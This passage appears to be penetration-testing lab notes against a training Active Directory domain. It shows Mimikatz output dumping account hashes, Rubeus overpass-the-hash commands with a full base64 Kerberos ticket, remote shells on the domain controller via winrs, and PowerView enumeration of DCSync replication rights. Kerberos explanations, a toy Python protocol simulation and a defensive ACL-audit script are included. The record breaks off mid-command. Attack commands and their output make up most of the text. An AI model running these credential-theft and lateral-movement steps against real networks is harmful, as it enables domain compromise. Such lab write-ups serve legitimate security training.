Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:57:38 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
rc4_hmac_nt 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old 95e2cd7ff77379e34c6e46265e75d754
rc4_md4 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_nt_exp 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old_exp 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 359605 (00000000:00057cb5)


Session : RemoteInteractive from 2
User Name : mgmtadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:25:49 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
rc4_hmac_nt 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old 95e2cd7ff77379e34c6e46265e75d754
rc4_md4 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_nt_exp 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old_exp 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 288282 (00000000:0004661a)


Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:20:28 AM
SID : S-1-5-96-0-2

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20803 (00000000:00005143)


Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-1

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 999 (00000000:000003e7)


Session : UndefinedLogonType from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:48 AM
SID : S-1-5-18

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

mimikatz(powershell) # exit
Bye!

We were able to dump the hashes of the domain administrator "svcadmin". We will run an OverPass the
Hash attack to get a command prompt with svcadmin privileges.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : KBP1CWK9
[*] Domain : 1M7RWTIY
[*] Password : QY1PO8FU
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3488
[+] LUID : 0xbd126c

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 12391020
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGAjCCBf6gAwIBBaEDAgEWooIE2TCCBNVhggTRMIIEzaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BHUwggRxoAMCARKhAwIBAqKCBGMEggRfugg/HGNNAeUGVYPfL8y92mIQxwLovQRGEfQ/8QZFN9qyrkTR
M6Bm8hA2PiTQgTBlO/pIYz9WnMZChFCoFufx/gztpSV2bVkNm8T9PPBq/h1rDUy2w0D2WVcBnFh9phGn
tgz1RwML2z7/uFw2G06H1+ccmIqyDMHoqvxOlAG0TweGy67kB/9FJlBvom2tKf5imlV5ToFVGeQyobsn
MW4QY08JBGnIDskBD4FvbCsZxcZaH8ruSXDek72NhKUlyheeurJE2CC1DSP0xja/mAFcJ/gjHIAN98A3
pvf0dFoHDcfENFxqo8RKRvrWlu+lQtvnhT86d/CP7WI0XTEWA8dFMnxD/Jug4w3n1o18XGQCay5yzNDi
FVOT/ktihsyiYvo8KTstO0RUPdYVt4+zSEIC9OeO9dZVviGWADvfQemvDierN/Xxq57XiIQeXUVazp8c
9TxNVPVKw65GdAQg4uLZvP7bQ6akfZdmok3Jw6UBfybn5F8Ui9Sh+jm3YphLKP7MjBJwCTTYjBYPvWIM
RuzK8aXz7aqFHTEwSqUKEnclf22O7C2Pjd3m4ewe4hRFjOAbkSs8MdqhigfwofiwpdjR2WLTPZsZTht0
upK0VYt915pY790d47KSzNkm6Nq5o4S9yb3EwS5on3EccCF5p0ZuUo1aFj1v0Oaowy5mvOCeuR3ZQBWq
KxpyH9oO4BtjVOGaAqEMz7KrGgIvoP+LbbDzVM8nJiMlHWL6PXx+EweRSBr4lZ198HL2OBqwH7LNTPyE
zIr2TmPWi9FCPQCc057dJ2FoXHfZBJpUuCfdu+n+Z/hIcyRV2JW2e0Gw/2Tjx1+Hkh6/IbPj6A7g7Z2T
TdN+JLilInHC+paFJbOeuN8mHF+eFHNYN4hBK1WGQVvvD7u9JY9F51KmSX5prMuGzfk4uj87RQLb+wAQ
LRoVf3mhT/9q/fXwmoCfw1RTttSIRpBR14Ungl+JoFumvdrpn5AmCIVF248FzfJbUEjtbjC+dC6iAmws
445wijZrqTAd+6mhPdtRxTcUVGJaNLg0RjnpVBB+GAxGlqyjwHNVUQGoNUn0KmvEcr1TY1cYE9OAVrFY
Xu0RXerTowC+uEGsLkMW5L4DV4tYimdCdMqKqskdHGzwgwiLsy2YE7dVaHTFbfqbTSmoeY1JFnUWl8s/
d9va9mQrfEeXdHFGlTkCU9c5lO99qbBD3TH5G4pe9WJE6NIhI4wzDEYrRUxWgikixLRly5KRv2oyNsqg
1uVr39Rbioq0LJDQ5+A4O7+PxMb/FP6ctY5ggMFzIbantroCkZFmPHTFZY/MFKLbk3XdYDLSFYlwidGO
xWgOo1Uf4iRe5Im93q89Qg96LYCxMcofpZGj4sldYgbREEtpy4H+N0kELWc3iXDVPUUmjk4vM7EFl34M
KWJkUEihKgtaIW8cOlig7R2qg7R513p/cfhw5sl+65UUO2zI17gLtsmytTRWSGLZTpSq0rBntIc8kT5n
yv4Vo4IBEzCCAQ+gAwIBAKKCAQYEggECfYH/MIH8oIH5MIH2MIHzoCswKaADAgESoSIEIBQqrtflFLlI
LltMXZ4CmqcDaZQsu5kOOjL6grLB+qJboRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohUwE6AD
AgEBoQwwChsIc3ZjYWRtaW6jBwMFAEDhAAClERgPMjAyNDA2MjcxMDA1MTJaphEYDzIwMjQwNjI3MjAw
NTEyWqcRGA8yMDI0MDcwNDEwMDUxMlqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMC
AQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FM
[*] Target LUID: 0xbd126c
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 3:05:12 AM
EndTime : 6/27/2024 1:05:12 PM
RenewTill : 7/4/2024 3:05:12 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : FCqu1+UUuUguW0xdngKapwNplCy7mQ46MvqCssH6ols=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new Command Prompt opens. The following commands are entered in the new session.
C:\Windows\system32>set username
USERNAME=student163

C:\Windows\system32>set computername
COMPUTERNAME=DCORP-STD163

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local whoami


dcorp\svcadmin

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local hostname


dcorp-dc

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd.exe


Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>set username
set username
USERNAME=svcadmin

C:\Users\svcadmin>set computername
set computername
COMPUTERNAME=DCORP-DC

Domain Persistence

Introduction to Kerberos
Kerberos is a network authentication protocol designed to provide secure authentication for users and
services in a computer network. Developed at the Massachusetts Institute of Technology (MIT), Kerberos
is widely used in various operating systems, including Windows, UNIX, and Linux, to manage network
security.

Key Concepts of Kerberos


Authentication
Kerberos is primarily used to authenticate users and services in a secure manner, ensuring that both
parties in a communication are who they claim to be.

Tickets
Kerberos uses tickets to grant access to services. A ticket is a time-stamped token that proves the identity
of a user. Tickets are issued by the Key Distribution Center (KDC).

Key Distribution Center (KDC)


The KDC is a trusted third-party service that consists of two parts:

• Authentication Server (AS): Responsible for authenticating users and issuing Ticket Granting
Tickets (TGT).

• Ticket Granting Server (TGS): Issues service tickets based on the TGT provided by the user.

Ticket Granting Ticket (TGT)


A TGT is a special ticket issued by the Authentication Server after a user successfully authenticates. It
allows the user to request service tickets from the Ticket Granting Server without needing to re-enter
credentials.

Service Tickets
Service tickets are issued by the TGS and are used to access specific services within the network. Each
service ticket is encrypted with the service's secret key.

How Kerberos works

AS-REQ
The ticket request from the user contains a timestamp encrypted with the user's password. The Domain
Controller receives the request and, since it has access to all the passwords, decrypts the timestamp
sent by the user and verifies that it is current.

AS-REP
The domain controller sends back a User Ticket (TGT) together with a session key that is encrypted with
the user's password. The TGT contains the same session key, but the TGT itself is encrypted with the
krbtgt's password. The user receives both the TGT and the session key. Since the user does not have the
krbtgt's password, it cannot decrypt the TGT; it can decrypt the session key because that is encrypted
with its own password. The KRBTGT account is a special account in Active Directory (AD) that the Key
Distribution Center (KDC) uses to encrypt and sign all Kerberos tickets. The name "KRBTGT" stands for
Kerberos Ticket Granting Ticket.

TGS-REQ
The user then sends a ticket request for the service to the domain controller. The request contains the
TGT received in the previous step (which the user could not decrypt) and an authenticator encrypted with
the session key obtained in the previous step. The domain controller decrypts the TGT with the krbtgt's
password, obtains the session key, and uses it to decrypt the authenticator sent by the user.

TGS-REP
The DC sends a service ticket and a new session key to the user. The new session key is also included in
the service ticket, which is encrypted with the service account's password; the Domain Controller knows
which service account is responsible from the Service Principal Name (SPN). The new session key that is
sent separately alongside the service ticket is encrypted with the user's password. The user receives the
service ticket and the new session key, decrypts the new session key, and cannot decrypt the service
ticket because it does not have the service account's password.

AP-REQ
The user sends the service ticket obtained in the previous step (which it could not decrypt), along with an
authenticator, to the service it needs access to. The authenticator is encrypted with the new session key
obtained in the previous step.

AP-REP
The service decrypts the service ticket using the service account's password, obtains the session key, and
uses it to decrypt the user's authenticator. The user is now authenticated to the service.
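The six messages above, played end to end as an added example (this is not code from the lab notes and not a Kerberos implementation). Both sides are simulated in one process: a KDC object holds every principal's long-term key, the client derives only its own key from a constructed password, and the service holds its own key. The "encryption" is a stdlib-only HMAC-SHA256 keystream with an HMAC tag, a toy stand-in for the AES-CTS etype; the SPN "cifs/dcorp-dc" and all passwords are constructed. One caveat a practitioner should note: in the simulation the TGS-REP's session key is wrapped under the TGT session key, as RFC 4120 specifies, rather than under the user's password. The point the code makes is which key opens which blob: the client's own key cannot open the TGT, and the service never sees the user's key at all.

```python
import hashlib
import hmac
import json
import os
import time

REALM = "DOLLARCORP.MONEYCORP.LOCAL"  # realm from the lab notes


def string_to_key(password: str, principal: str) -> bytes:
    """Toy stand-in for Kerberos string-to-key: PBKDF2 over the password with the
    REALM+principal salt (the same salt shape Rubeus prints above for svcadmin)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), (REALM + principal).encode(), 4096)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(key: bytes, obj: dict) -> bytes:
    """Toy authenticated encryption (HMAC keystream XOR + HMAC tag); not a real etype."""
    plaintext = json.dumps(obj, sort_keys=True).encode()
    nonce = os.urandom(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def decrypt(key: bytes, blob: bytes) -> dict:
    """Raises ValueError when the key is wrong, which is how 'cannot decrypt' shows up."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("integrity check failed: wrong key")
    return json.loads(bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct)))))


class KDC:
    """The DC side: holds every principal's long-term key (passwords are constructed)."""

    def __init__(self, passwords: dict):
        self.keys = {p: string_to_key(pw, p) for p, pw in passwords.items()}

    def as_exchange(self, user: str, enc_timestamp: bytes):
        # AS-REQ: only the user's key opens the pre-auth timestamp; stale ones are rejected.
        ts = decrypt(self.keys[user], enc_timestamp)["ts"]
        if abs(time.time() - ts) > 300:
            raise ValueError("timestamp not current")
        sk = os.urandom(32).hex()
        tgt = encrypt(self.keys["krbtgt"], {"user": user, "sk": sk})  # sealed with krbtgt key
        return tgt, encrypt(self.keys[user], {"sk": sk})               # AS-REP enc-part

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, spn: str):
        # TGS-REQ: open the TGT with krbtgt's key, then the authenticator with the session key.
        t = decrypt(self.keys["krbtgt"], tgt)
        if decrypt(bytes.fromhex(t["sk"]), authenticator)["user"] != t["user"]:
            raise ValueError("authenticator does not match TGT")
        sk2 = os.urandom(32).hex()
        ticket = encrypt(self.keys[spn], {"user": t["user"], "sk": sk2})  # service's key
        # TGS-REP enc-part goes under the TGT session key (RFC 4120), not the user's password.
        return ticket, encrypt(bytes.fromhex(t["sk"]), {"sk": sk2})


def service_ap_exchange(service_key: bytes, ticket: bytes, authenticator: bytes) -> str:
    """AP-REQ on the service side: open the ticket, then the authenticator inside its key."""
    t = decrypt(service_key, ticket)
    if decrypt(bytes.fromhex(t["sk"]), authenticator)["user"] != t["user"]:
        raise ValueError("authenticator does not match ticket")
    return t["user"]  # AP-REP: the user is authenticated to the service


def run_exchange(user="svcadmin", password="constructed-user-pw", spn="cifs/dcorp-dc") -> dict:
    """Client side of all six messages; returns what the client ended up proving."""
    kdc = KDC({user: password, "krbtgt": "constructed-krbtgt-pw", spn: "constructed-svc-pw"})
    user_key = string_to_key(password, user)  # the client derives only its own key
    tgt, as_rep = kdc.as_exchange(user, encrypt(user_key, {"ts": time.time()}))
    sk = bytes.fromhex(decrypt(user_key, as_rep)["sk"])
    try:
        decrypt(user_key, tgt)  # the client holds no krbtgt key, so this must fail
        client_opens_tgt = True
    except ValueError:
        client_opens_tgt = False
    tgs_auth = encrypt(sk, {"user": user, "ts": time.time()})
    ticket, tgs_rep = kdc.tgs_exchange(tgt, tgs_auth, spn)
    sk2 = bytes.fromhex(decrypt(sk, tgs_rep)["sk"])
    ap_auth = encrypt(sk2, {"user": user, "ts": time.time()})
    who = service_ap_exchange(kdc.keys[spn], ticket, ap_auth)  # the service knows its own key
    return {"authenticated_as": who, "client_can_open_tgt": client_opens_tgt}


if __name__ == "__main__":
    print(run_exchange())
```

Running it prints that the client was authenticated as svcadmin and that it could not open its own TGT. The same structure is what makes the later sections work: whoever holds the krbtgt key can mint TGTs that the KDC accepts, and whoever holds a service key can read that service's tickets, which is why the krbtgt secret dumped by DCSync below matters so much.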

DCSync attack
Organizations often have multiple Domain Controllers for their Active Directory, either as backups or
one per location so that authentication and other policies are available locally at that site. With
multiple Domain Controllers in the organization, every Domain Controller must be aware of every change
made in the environment. These changes are synchronized between Domain Controllers via the Microsoft
Directory Replication Service Remote Protocol (MS-DRSR).

DCSync is a technique used to extract credentials from Domain Controllers. In this attack, we mimic a
Domain Controller, leverage the MS-DRSR protocol and request replication using the GetNCChanges
function. In response, the Domain Controller returns the replication data, which includes password
hashes. This technique was added to the Mimikatz tool in August 2015 by Benjamin Delpy and Vincent Le
Toux.

To perform a DCSync attack we need the following rights on the Domain Object:

1. Replicating Directory Changes (DS-Replication-Get-Changes)

2. Replicating Directory Changes All (DS-Replication-Get-Changes-All)

3. Replicating Directory Changes in Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set) (this
one isn't always needed but we can add it just in case)

Generally, members of Administrators, Domain Admins, or Enterprise Admins as well as Domain
Controller computer accounts by default have the above rights.

However, in an incorrectly configured environment it may be possible to hunt down users who have the
required individual permissions without being in any of the aforementioned groups. These individual
permissions are:

• Replicating Directory Changes

• Replicating Directory Changes All

• Replicating Directory Changes in Filtered Set

Enumeration
The following PowerView command enumerates the principals that hold the required rights on the domain object.
PS C:\Windows\system32> Get-ObjectACL "DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs |
foreach {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName
$_.SecurityIdentifier);$_} | ? { ($_.ActiveDirectoryRights -match 'GenericAll') -or
($_.ObjectAceType -match 'Replication-Get') }

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-498
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : mcorp\Enterprise Read-only Domain Controllers

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-516
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\Domain Controllers

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Administrators

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Administrators

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Administrators

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-9
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Enterprise Domain Controllers

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-9
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Enterprise Domain Controllers

AceType : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-519
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowed
IdentityName : mcorp\Enterprise Admins

AceType : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : Local System
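Reading that output by eye works for one domain; the check a defender actually wants is "who holds replication rights that is not a default holder, and whose rights are sufficient for a full DCSync". The following is an added example, not code from the lab notes or from PowerView: it parses the `Key : Value` record format shown above (the sample records are constructed and trimmed to the relevant fields; `dcorp\svcbackup` is a hypothetical delegated account, not one from the lab) and reports the non-default holders. A record is closed by a blank line or by a repeated key, because the output above sometimes omits the blank line between records.

```python
import re

REPLICATION_RIGHTS = {
    "DS-Replication-Get-Changes",
    "DS-Replication-Get-Changes-All",
    "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Principals that hold these rights by default (compared without the domain prefix).
EXPECTED_HOLDERS = {
    "Administrators", "Domain Admins", "Enterprise Admins", "Domain Controllers",
    "Enterprise Domain Controllers", "Enterprise Read-only Domain Controllers", "Local System",
}

# Constructed sample in the Get-ObjectACL output format above, trimmed to the fields the
# audit needs. 'svcbackup' and its SID are hypothetical; the missing blank line before the
# third record is deliberate, to exercise the repeated-key record split.
SAMPLE_ACL = r"""
AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-All
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-516
IdentityName : dcorp\Domain Controllers

AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
SecurityIdentifier : S-1-5-18
IdentityName : Local System
AceQualifier : AccessAllowed
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes
SecurityIdentifier : S-1-5-21-0-0-0-1105
IdentityName : dcorp\svcbackup

AceQualifier : AccessAllowed
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-All
SecurityIdentifier : S-1-5-21-0-0-0-1105
IdentityName : dcorp\svcbackup
"""

_FIELD = re.compile(r"^\s*(\w+)\s*:\s*(.*)$")


def parse_aces(text: str) -> list:
    """Turn PowerShell's 'Key : Value' list output into one dict per ACE."""
    records, current = [], {}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if not m or m.group(1) in current:  # blank line or repeated key: flush the record
            if current:
                records.append(current)
            current = {}
        if m:
            current[m.group(1)] = m.group(2).strip()
    if current:
        records.append(current)
    return records


def dcsync_rights(ace: dict) -> set:
    """Rights in this ACE that matter for DCSync (empty set if none)."""
    if ace.get("AceQualifier") != "AccessAllowed":
        return set()
    if "GenericAll" in ace.get("ActiveDirectoryRights", ""):
        return {"GenericAll"}
    return {ace["ObjectAceType"]} if ace.get("ObjectAceType") in REPLICATION_RIGHTS else set()


def audit(text: str):
    """Returns (holders, unexpected, full): rights per principal, the holders that are not
    default, and the principals whose rights suffice for a full DCSync (GenericAll, or both
    Get-Changes and Get-Changes-All)."""
    holders = {}
    for ace in parse_aces(text):
        rights = dcsync_rights(ace)
        if rights:
            name = ace.get("IdentityName") or ace.get("SecurityIdentifier")
            holders.setdefault(name, set()).update(rights)
    unexpected = {n: r for n, r in holders.items() if n.split("\\")[-1] not in EXPECTED_HOLDERS}
    needed = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
    full = {n for n, r in holders.items() if "GenericAll" in r or needed <= r}
    return holders, unexpected, full


if __name__ == "__main__":
    holders, unexpected, full = audit(SAMPLE_ACL)
    for name, rights in unexpected.items():
        print(f"non-default holder: {name} -> {sorted(rights)}  full DCSync: {name in full}")
```

Feeding it the real `Get-ObjectACL` output (piped to a file) instead of the sample is a one-line change. The split between "holds any replication right" and "holds enough for a full DCSync" matters in review: Get-Changes alone does not return secrets, Get-Changes-All does, and GenericAll lets the holder grant itself both.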

Execution
To obtain the hash of the krbtgt account we need domain administrative privileges or the rights required
to execute the DCSync attack.
We already have the hash of one of the Domain Admins, "svcadmin". We will use an Overpass-the-Hash
attack to open a command prompt or PowerShell with Domain Administrator privileges.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : 64L72Z6Q
[*] Domain : S38MUUI4
[*] Password : OBSF3AIL
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4832
[+] LUID : 0xcad172

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 13291890
